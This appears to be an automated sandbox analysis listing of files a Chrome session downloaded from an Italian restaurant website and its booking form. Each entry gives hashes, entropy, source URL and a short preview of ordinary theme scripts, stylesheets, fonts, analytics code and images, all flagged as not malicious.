                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/14.0.2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return b(d);return b(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,a){return o(d,function(d){var u,f,c=d,e=x(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,n),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,n,r,o,i,s,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a]
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3478
                                                                                                                                              Entropy (8bit):5.013823028619358
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Ng9dEk14Tud9tcfyE9tqIaCGRjn81zuT2lmK:oEk1xjiFTGRjn81aa8K
                                                                                                                                              MD5:CB40772DDF9EEBDBD18E59EC68831D58
                                                                                                                                              SHA1:B06693EF8015D11D3D3F8FE4CEF08B112F48F20A
                                                                                                                                              SHA-256:929937A67F4200F5DF7D383E95FE4EDE9B399B5516842AAF55DE33AEC6689F60
                                                                                                                                              SHA-512:F79CD3D704EE55C3F7CBD887BAD5BF6F581BDA619C64BE5139205E017EFD81D261E3D88F3561FED5B9AE8D5C7D1B178158C42DC029B90E3F9538EE5A5789B6A4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/team/team.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Team Member.====================================================================================================================================================== */..avia-team-member{margin:30px 0; clear:both;}..avia-team-member.avia-builder-el-no-sibling{margin:0;}..team-member-name{margin-top:7px; font-size: 1.55em; }..team-member-job-title{margin-top:-7px; font-size: 1em; }..team-member-description{}..team-social a{text-decoration: none; position: relative; border-radius: 30px; padding: 0 16px; background: #fff;margin: 3px; display: inline-block; height:53px; line-height:54px; width:53px; }..team-img-container{ position: relative; overflow: hidden; border-radius: 3px; text-align: center; margin-bottom:10px; }..team-img-container img{ display:block; margin:0 auto; width:100%;}..team-img-container img.av-team-img-original{ width:aut
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):784
                                                                                                                                              Entropy (8bit):4.440391379109024
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:jn4IfO8hRGcNmZH8Hql298TggCCgEcMTXeWmos5/ZzWgMb:bThj62CTzTXeWmos5xzWgMb
                                                                                                                                              MD5:08B7F19D89B532948C890F1107A76C9C
                                                                                                                                              SHA1:CEDB1D9D8444B39C24FAA7E9EF502FF0ACD2F925
                                                                                                                                              SHA-256:5CF52E501833EB1D14D3C61DE8243E9639ABDAF65555F7F5281CF7DD09336F23
                                                                                                                                              SHA-512:6F24C703A4DE00FBECE42E6E7E2C539DC3B9AEE5BE7BC4F745110E4BB99DDCBB1C06B2D2B6584E277FC130DC1A02289A7D9C16D8B27A3BC607543DD07830F60F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// AVIA Image Hotspots.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.aviaHotspots = function( options )..{...if(!this.length) return; ....return this.each(function()...{....var _self = {};........_self.container.= $(this);...._self.hotspots.= _self.container.find('.av-image-hotspot');........._self.container.on('avia_start_animation', function().....{......setTimeout(function()......{......._self.hotspots.each(function(i).......{........var current = $(this);........setTimeout(function(){ current.addClass('av-display-hotspot'); },300 * i);.......});......},400);.....});....});..};...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1150
                                                                                                                                              Entropy (8bit):2.9914376412796244
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Xo/hxah7oSOh5to1Tyq5UqLJW7TlazsaP6hdffHaaPolDGaaIRNJhA7qEdaykIl:Xo/RS8opygjPsdXKPaaPhA7Z1
                                                                                                                                              MD5:29DDA1D7574B984EB7E30505D62B02D0
                                                                                                                                              SHA1:256D8D0459AA08D73D175DEFF411EAF637AED4FD
                                                                                                                                              SHA-256:A62D1A1A39334BF7DE045A7122A9F602B3FD569197DBA0E9AD3940B103C170A8
                                                                                                                                              SHA-512:66916CFFAFA9EDF53F032237AA052CFD3A996425998361A1AD35358A6AB673FC25D892387926A2EE15A85688DBCAF8E7792A5B161745703B9AA0830C90D17EE0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/favicon.ico
                                                                                                                                              Preview:............ .h.......(....... ..... .............................................................................................................................................................................TO..................TN..................................................PJ..PJ.................................................."...................................................PN..........KF......^X..\W......50..........PN......................C=......OM..................=;......-&..........................3,..ni......................ok..rm..%...............................?;..........................3/..................................KE..........................OI..........................JH..............c^..........b]..............JH..................................&%..YV..TQ..(&..............................................................................................................HB..................HB................................................................
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):118584
                                                                                                                                              Entropy (8bit):4.892184868161695
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:MfRA1RAzJJf6d23Mp2rwRJkg0P03+nSWmsUwU7jNkU2dxTMCzGfI3b6beV0jq85t:MZALAQ0c
                                                                                                                                              MD5:3145B6E53E8C3C59F34303D95642A9AD
                                                                                                                                              SHA1:808D0C750AB996A58268C5DE68BB1484700030A6
                                                                                                                                              SHA-256:DA477638BCA4A28114371065135F7F9B388C939AE8DBBDF528A17E6C931872ED
                                                                                                                                              SHA-512:BFCDD95E342C9BA8CF736FED98754974246D194461FCB56D1D38F8884D617A7012083FB9B4E6DD8A8F45D8CE988926032EC8EAB10524C0622852BE0E8DF5D1A8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://enginev2.pienissimo.com/v4/ordini/getFormInfo?cod_univoco=47667869&id=Fl7E3J&type=formprenotazione&doNotCheckUser=true
                                                                                                                                              Preview:{"id_form":1,"titolo":"WEB","settings":{"custom":[{"tipo":"2","value":[{"tags":[],"value":"Sala interna / Indoor","prezzo":""},{"tags":[],"value":"Dehor esterno / Outdoor","prezzo":""}],"attivo":false,"titolo":"Dove preferirebbe stare? / Where would you rather be?","obbligatorio":true,"value_BackUp":[{"tags":[],"value":[{"nome":"Sala interna / Indoor","lingua":"it"}],"prezzo":""},{"tags":[],"value":[{"nome":"Dehor esterno / Outdoor","lingua":"it"}],"prezzo":""}],"titolo_BackUp":[{"nome":"Dove preferirebbe stare? / Where would you rather be?","lingua":"it"}]},{"tipo":"2","value":[{"tags":[{"tag":"coppia","tipo":"custom","id_tag":102,"not_editable":false}],"value":"Coppia / Couple","prezzo":""},{"tags":[{"tag":"famiglia","tipo":"custom","id_tag":94,"not_editable":true}],"value":"Famiglia / Family","prezzo":""},{"tags":[{"tag":"lavoro","tipo":"custom","id_tag":107,"not_editable":false}],"value":"Lavoro / Work business","prezzo":""},{"tags":[{"tag":"amici","tipo":"custom","id_tag":103,"not
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):835036
                                                                                                                                              Entropy (8bit):7.979982287639451
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:5vcW0GiI9uhhrqtbdnhGnIruCKa6lDS0Kezf7Mm2DKo521MmnoCCJiyan9rYjJtM:iLIaeteIqCKjT7wvIlyh/MWY
                                                                                                                                              MD5:9589E20DF5D6622D02B50D7FD39FEFD4
                                                                                                                                              SHA1:0AB655B5574DFF4B9EAA2EE7488AC76D7A7E1248
                                                                                                                                              SHA-256:CC253D9002882E1FE40212D055A2D3C61269752D4E0FE5B7AEA1A7D9C7632037
                                                                                                                                              SHA-512:A88DD06FF946A0F76484EFA5B47BC5765970034EFF6A3B57E13EDEDC21CDD144AE795D8273E36395CA57087A3D5E59C91CCCF41E6A55FE667A8C4C39C13E1FA0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......JFIF.............dICC_PROFILE......Tlcms.0..mntrRGB XYZ ............acspMSFT...................................-lcms................................................desc.......>cprt...H...Lwtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...0...$mluc............enUS...".....s.R.G.B. .I.E.C.6.1.9.6.6.-.2...1..mluc............enUS...0.....N.o. .c.o.p.y.r.i.g.h.t.,. .u.s.e. .f.r.e.e.l.yXYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T{..L.......&f...\...C....................................................................C.......................................................................v................................................S........................!..1.A.."Q.2aq.#...B..R.....$3b...%Cr.&4..'...56DScs(7EF...................................W......................!1..AQ.aq.."....2......#B...R3b.$r
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2080
                                                                                                                                              Entropy (8bit):4.748470821267847
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:4L9E2Q8Zgwl4TtWYWUP+QzQlitVUkeVPW:4GIgwl4pfWU2RsVUkeo
                                                                                                                                              MD5:0DCEDA7E2D57833B75D29EE61E5AF2A5
                                                                                                                                              SHA1:49587E7720FB374F01A3F69E22641A33E2958E66
                                                                                                                                              SHA-256:E6B9CEDB6592510EE8F3A5824D1C6F758165211EA1FDF85042C0B0DA9DF34AED
                                                                                                                                              SHA-512:87FADCBA1F71710AEDCC17A2752E1C990EF599F3EB756913D1BA139130C50FE681FAFC088A9DBCC890EFE3591C27A65CD854C1674E8BDDC30CB453C7AD1C2A5A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA Player.// .// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....var autostarted = false,...container = null,.....monitorStart = function( container )....{.....var play_pause.= container.find('.av-player-player-container .mejs-playpause-button');..........if( play_pause.length == 0 ).....{......setTimeout( function(){........monitorStart( container );.......}, 200 );.....}..........if( ! play_pause.hasClass('mejs-pause') ).....{......play_pause.trigger( 'click' );.....}.........};....$.fn.aviaPlayer = function( options )..{....if( ! this.length ) return; ....return this.each(function()...{....var _self ...= {};........_self.container..= $( this );...._self.stopLoop..= false;........_self.container.find('audio').on('play', function() {..........if( _self.stopLoop )..........{...........this.pause();.........
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):289
                                                                                                                                              Entropy (8bit):5.045022750980313
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JacMDMwlRtuuHWqlqRt94yzXlqRtCx+vFjlC:t43Q6MwR3xgqsVg/5I
                                                                                                                                              MD5:1D72A5DEC3ACD073763570E3E5FDF784
                                                                                                                                              SHA1:25ECFF80EB26EF79709AB7278EB3991AC8CC2734
                                                                                                                                              SHA-256:9FA88118818D9B64838F578E2BABCCA3D0630AED21B5C33B34AFF7AC5CE506BC
                                                                                                                                              SHA-512:DEE0B0CAE09B07705091CD7371F40650D09FB1FBD736E60FA2716679A660B515A0C74BDFCDB5A9D32A178870A14697010B018C417CE30402F5FFA42C8B8384A2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/it.08db2cd122d5f99494dd.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-it" viewBox="0 0 640 480">. <g fill-rule="evenodd" stroke-width="1pt">. <path fill="#fff" d="M0 0h640v480H0z"/>. <path fill="#009246" d="M0 0h213.3v480H0z"/>. <path fill="#ce2b37" d="M426.7 0H640v480H426.7z"/>. </g>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):9488
                                                                                                                                              Entropy (8bit):5.079910664283746
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:pYN4fYeJ7IdtQu7ssNiT4G5owhS0RbVvdmjerkWLR0qKS9ldUBZeptosk/CFClUi:0eJ7ytQu4sscGBZbCjeoWLCTCuQM
                                                                                                                                              MD5:A516AC271A7383CE6472DAE01E294DEB
                                                                                                                                              SHA1:B1143BFD291EB25058084324F4BF0A91524731F0
                                                                                                                                              SHA-256:F5901BA0DC5217A5BE6A13877D4D0DF247676D8527554121288D08101F513E3F
                                                                                                                                              SHA-512:3E541B03986446B26450510E85C12270FD519BF85DDE4B68E9E9BBF0DC14163D4DD26A411DF65BF157BE85E87060E3E05B42F7460A9BBF7199999D9A5D25469C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/grid.css?ver=4.5
                                                                                                                                              Preview:./* Table of Contents.==================================================. #Base 960 Grid. #Tablet (Portrait). #Mobile (Portrait). #Mobile (Landscape). #Clearing */./* #Base 960 Grid.================================================== */.html { min-width: 910px; }.html.responsive { min-width: 0px; }..boxed#top { margin: 0 auto; overflow: visible; /* position:relative; z-index: 3; */ }...container {. position: relative;. width: 100%;. margin: 0 auto;. padding: 0px 50px;. clear: both;.}.....inner-container{ position: relative; height:100%; width:100%; }../*no z-index for container_wrap or fixed bgs start disapearing when other elements transition -> weird chrome bug*/..container_wrap {. clear: both;. position: relative;. /* z-index: 1; */. border-top-style: solid;. border-top-width: 1px;.}...unit, .units {. float: left;. display: inline;. margin-left: 50px;. position: relative;. z-index: 1;. min-height: 1px;.}..row {. position: relative;. margin-bottom: 20p
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (551)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):227261
                                                                                                                                              Entropy (8bit):5.483775665452673
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:vHdwBc2ltglAnjnc5g0Ci0s0LLM+L3Fv+zMqxAKp:vHdYtgkg5gLi0s0LLM+L3FPq6Kp
                                                                                                                                              MD5:7204A090B5E030D4C2CD9FF168D00C7A
                                                                                                                                              SHA1:B68C14E834050BD237D222F7F8772C8D87EC1BE9
                                                                                                                                              SHA-256:1B16FB7B71EB885AB2F0310063BA192F2786F428CD4F52C21596C88CCD8DD848
                                                                                                                                              SHA-512:DFD75CC95F1FC5919B7E7EF5430C45E09069E2B0A0D9EA6D5333737CA3FBE297320C067654E54D79A4CACA17E4B413BE5B09E3C55EE835308FF345B533F676AC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://mc.yandex.ru/metrika/tag.js
                                                                                                                                              Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Pa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Pa(u(ba))}.var Of="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Pf;if("function"==typeof Object.setPrototypeOf)Pf=Object.setPrototypeOf;else{var Mh;a:{var Nh={a:!0},Oh={};try{Oh.__proto__=Nh;Mh=Oh.a;break a}catch(ba){}Mh=!1}Pf=Mh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Fm=Pf;.function Gm(ba,ta){ba.prototype=Of(ta.prototype);ba.prototype.constructor=ba;if(Fm)Fm(ba,ta);else for(var $a in ta)if("p
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1150
                                                                                                                                              Entropy (8bit):2.9914376412796244
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Xo/hxah7oSOh5to1Tyq5UqLJW7TlazsaP6hdffHaaPolDGaaIRNJhA7qEdaykIl:Xo/RS8opygjPsdXKPaaPhA7Z1
                                                                                                                                              MD5:29DDA1D7574B984EB7E30505D62B02D0
                                                                                                                                              SHA1:256D8D0459AA08D73D175DEFF411EAF637AED4FD
                                                                                                                                              SHA-256:A62D1A1A39334BF7DE045A7122A9F602B3FD569197DBA0E9AD3940B103C170A8
                                                                                                                                              SHA-512:66916CFFAFA9EDF53F032237AA052CFD3A996425998361A1AD35358A6AB673FC25D892387926A2EE15A85688DBCAF8E7792A5B161745703B9AA0830C90D17EE0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:............ .h.......(....... ..... .............................................................................................................................................................................TO..................TN..................................................PJ..PJ.................................................."...................................................PN..........KF......^X..\W......50..........PN......................C=......OM..................=;......-&..........................3,..ni......................ok..rm..%...............................?;..........................3/..................................KE..........................OI..........................JH..............c^..........b]..............JH..................................&%..YV..TQ..(&..............................................................................................................HB..................HB................................................................
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):7238
                                                                                                                                              Entropy (8bit):4.8628010967352076
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:YF9D9Q3Pt4dlFDe98GjK81nxpw9Hzx7YYUnxiCLc/fYo5gUuenI1:69D9Q3PtelFDMH71xpOlBiH8uMI1
                                                                                                                                              MD5:09B08C6DC04BFDAB0A31DA73CBA34EB2
                                                                                                                                              SHA1:29B37614F602A336A266702BF609DD3214E1BA30
                                                                                                                                              SHA-256:0332A5F4F922B4444F56E6FBF32034407BA146690A78E181126DA759B81C1BE3
                                                                                                                                              SHA-512:75FA7D15A53BC013BFDF51AACD0B85B12FBDA4BF32661966C8D4F149E098904A6CB37871376522151B63983A8A9B2E5984FC4110DCB687709330786668F128D5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.js?ver=6.0.9
                                                                                                                                              Preview:(function($)..{ ..."use strict";......// -------------------------------------------------------------------------------------------...// Tab Section...// -------------------------------------------------------------------------------------------......$.fn.avia_sc_tab_section= function()...{....var win ...= $(window),.....browserPrefix .= $.avia_utilities.supports('transition'),.....cssActive ..= this.browserPrefix !== false ? true : false,.....isMobile ..= $.avia_utilities.isMobile,.....transform3d..= document.documentElement.className.indexOf('avia_transform3d') !== -1 ? true : false,.....transition..= {};.........return this.each(function()....{.....var container ..= $(this),......tabs...= container.find('.av-section-tab-title'),..... tab_outer..= container.find('.av-tab-section-outer-container'),......tab_wrap..= container.find('.av-tab-section-tab-title-container'),......tab_nav...= container.find('.av_tab_navigation'), ......content_wrap.= container.find('.av-tab-section-inner
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):31458
                                                                                                                                              Entropy (8bit):4.936956087978602
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:J2Cxonb1/8rT68elt3uhcOt116+GgRCk5nacCaaYeYGBdZalfBSZTf:Maonx8r9eHuh3OUZHudZgBc
                                                                                                                                              MD5:77FDCBA71C41E4FF2B29F558A4193F1A
                                                                                                                                              SHA1:B78907AD116B273E1CAA89BAA6BFC00E8F433457
                                                                                                                                              SHA-256:419F6F322AFD038F55E29DD8EE201DD06C1895D77BD6888B3AD1C3FF936384B0
                                                                                                                                              SHA-512:48D52FFA1A04D7E849349E6B7E84BCA99461984CA30CC91C4F1D7FDCF4F1ED453260C7CA5CBB6ECAEABFD7055276A71BB5A84A3614FADBC3C78DD14FA4F76215
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Avia Slideshow.====================================================================================================================================================== */..(function($).{. "use strict";...$.AviaSlider = function(options, slider)..{...var self = this;......this.$win. = $( window );..... this.$slider = $( slider );.. ...this.isMobile = $.avia_utilities.isMobile;.. .. this._prepareSlides(options);.. ...//default preload images then init slideshow.. $.avia_utilities.preload({container: this.$slider , single_callback: function(){ self._init( options ); }});..}...$.AviaSlider.defaults = {.....//interval between autorotation switches...interval:5,....//autorotation active or not...autoplay:false,......//set if the loop will stop at the last/first slide or if the slides will loop infinite...//set to fals
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 300 x 143, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):17383
                                                                                                                                              Entropy (8bit):7.953734195324373
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:7ps7VxjdgANe442HnQZyAHugoLIe7eDsFEfzx2fh1r2M334ESJ:7kVxjGA44HHnOyACLIe+sedg1atJ
                                                                                                                                              MD5:89F94E28F27A6229E250935949B94D02
                                                                                                                                              SHA1:73EB36D1C86A093DF75EBD91265A54040CD6B9EF
                                                                                                                                              SHA-256:92737B2E4F1027162F3F4F621E1C2148818386A230EFB4FFA153EF29C3246F29
                                                                                                                                              SHA-512:BC47E33590D96A16055377628275D45D75619594FD5449CB00D47E604481AB64165CE51A59777090C9AD4342019CAE81D6203382E4631EDC01013357D9090C84
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png
                                                                                                                                              Preview:.PNG........IHDR...,.........@....C.IDATx..}w.$e..S.i.........KXr........fOOi.C.;.;...s...bF.#.. #Y.X`..9.....N.N.....W.4U...gz...O.&.TW...>......H ...H ...H ......A .<.%....!.&.e......&...$.@j.< .../..._a.....t......M.H.8.`..$_.........]/....@ ...@...b..l.Q.Q........h.....@..g.Y).."8e.Pc|E.l.p..{.\...$.@JfU/..m....y.v.x.@..3J...d.|....dQY.WJcg).".>.`!...x*.'...aI..DOo2W.s......8...d6..@.96......\........~A0..ek .....*....9......[...x..V2.C.vN.......de.zz........@...................R...x./.....n.F.K!N..2...p..m.v......X.`......>2.t........B.>..M..=...t..D.j..Z.......B.i&...K.|'...`..H}......A|J;......m.#..\.....fA|c..^1~...g..Yf.....8.O.8D...U.......z~.l...~3.O.x)...0..[.V............d2..h".9..W..k)....'..k.R~.I....6.`.......^......p..W.xm"nm.c.K.....^...2.&.?.4u.... ..;.@.._sp......|..w. .M.T).D....`.....5...Hv.Q.......... ....X.=......e..w.x..w.0..q..B..T.n..H .m...)x........ZV.`...r....L..l..1....x.!~......d..j..&.n.(....>..d...S.q+..V ..D.....e....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):19
                                                                                                                                              Entropy (8bit):3.6818808028034042
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:VQRWN:VQRWN
                                                                                                                                              MD5:9FAE2B6737B98261777262B14B586F28
                                                                                                                                              SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                                                                                                                              SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                                                                                                                              SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.google.com/async/ddljson?async=ntp:2
                                                                                                                                              Preview:)]}'.{"ddljson":{}}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 18 x 12, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):600
                                                                                                                                              Entropy (8bit):7.393135725142834
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:6v/7t5Z2Sk4hy7qYpClCUxPxZEZEx54fvYygSa7Aoqm4XK4Qi:GaHsXwZe5442kX6
                                                                                                                                              MD5:2878F64A0217A154E531853F6A822C65
                                                                                                                                              SHA1:AC7A53E9F53B9DE8A344C38222E217D50D559B83
                                                                                                                                              SHA-256:3F47C75FA68E49B1CDCA50C61E9CD6603B57C521E5E6809DF59A4A15E291A4EF
                                                                                                                                              SHA-512:0885BC73E9364C2B3C3730DCC5430E74BD17C3AB84F85A0FF33002BBBA95F6650622650BBAC35B05505978B58D98584F0C78B6A471E6449D33E333729C1FA0DC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR..............pz....+tEXtCreation Time.za 31 dec 2005 17:13:07 +0100.......tIME........O.^....pHYs...........~.....gAMA......a.....IDATx.c._Y....._....``h..e.^...." ...Tp.k.w..?k.2}.`pu.zt....."{...@..............<..gzi....[.....zJ..<I.......C..JJ.ww.~*&.D@....z.k3...6....3..!...:4..W?@.]>...D..PF."..?..=b@.O-,....h...{..=.... B...a`x...D.z.@.#Y....+).re..........3j.XY........g..MK.I...y..?..........V.5.~8......N....C...T.a.c.c.l..:....E......b.=...O.8&...k=.T....;..@.@...*BBL::..].ul...5...-,v.....Z..<.$ .........G..5G......c-/.~|.....}2.8.....IEND.B`.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4774
                                                                                                                                              Entropy (8bit):5.40512237954206
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:1OEaNOlOEaNVFZKOEaNHOEaNk3yOEaNqOEaNMJc+umOEaNY1N2OpaNUlOpaN8FZC:KNO6NfNANk3FNNN4YNYoNUXNVNeN13cn
                                                                                                                                              MD5:60214EDB5C2D6DB84D2D67D6829A97E2
                                                                                                                                              SHA1:E68B6DE223BC545A3BA7C8E6C8B203FC5153FB64
                                                                                                                                              SHA-256:C3E3D7E0BCE6022AE66381D04EB4742252D577BA15C5F9CCEB49CB14C9EB90B1
                                                                                                                                              SHA-512:708AC80C8F0D3F01A0838021F0D796482AED5C840ACB225AE0B7E46A60C01AA256485228385130096F05B035315A93A9EB17E05EADEE847B64340586115ED9B4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:"https://fonts.googleapis.com/css?family=Roboto:400,700&display=swap"
                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s
